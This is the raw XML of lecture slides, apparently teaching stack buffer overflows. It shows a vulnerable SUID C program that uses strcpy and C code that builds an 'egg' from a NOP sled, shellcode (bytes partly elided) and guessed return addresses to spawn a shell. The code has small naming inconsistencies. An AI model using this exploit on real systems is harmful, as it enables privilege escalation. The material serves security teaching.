          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895601" y="2457450"/>
            <a:ext cx="18902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“Guessed” Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550938" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1028700"/>
            <a:ext cx="8085138" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>A series of NOPs is inserted at the beginning of the overflowing buffer so that the jump does not need to be too precise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920559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t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to exploit the following SUID program:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	char copy[512];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(copy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	return vulnerable(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The only information available is the buffer size (every time a string that is bigger than 512 characters is passed as a parameter, the program dies with a segmentation fault)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8770913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t>Creating the “Egg”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define OFFSET 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define BSIZE 612 // Buffer length (&gt; 512)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define NOP 0x90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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 "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\x1f...\x0b"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>               "\x80... \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/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unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(void) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>__("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:b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char *buff, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr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long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>addr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offset=OFFSET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1] != NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    offset = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Creates the attack buffer */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  buff = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(BSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Gets the SP and computes the offset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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() - offset;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("Using address: 0x%x\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>addr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addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = (long *) buff;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552964" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Initializes buff with the chosen address */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  for (i = 0; i &lt; BSIZE; i+=4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    *(addr_ptr++) = addr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Fills the first half of the buffer with NOP instructions */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  for (i = 0; i &lt; BSIZE/2; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    buff[i] = NOP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Adds the shell code between the NOP sled and the address */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  for (i = 0; i &lt; strlen(shellcode); i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    *(ptr++) = shellcode[i];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  buff[bsize - 1] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Puts the EGG variable in the environment an starts a shell */</a:t>
            </a:r>
          </a:p>
          <a:p>
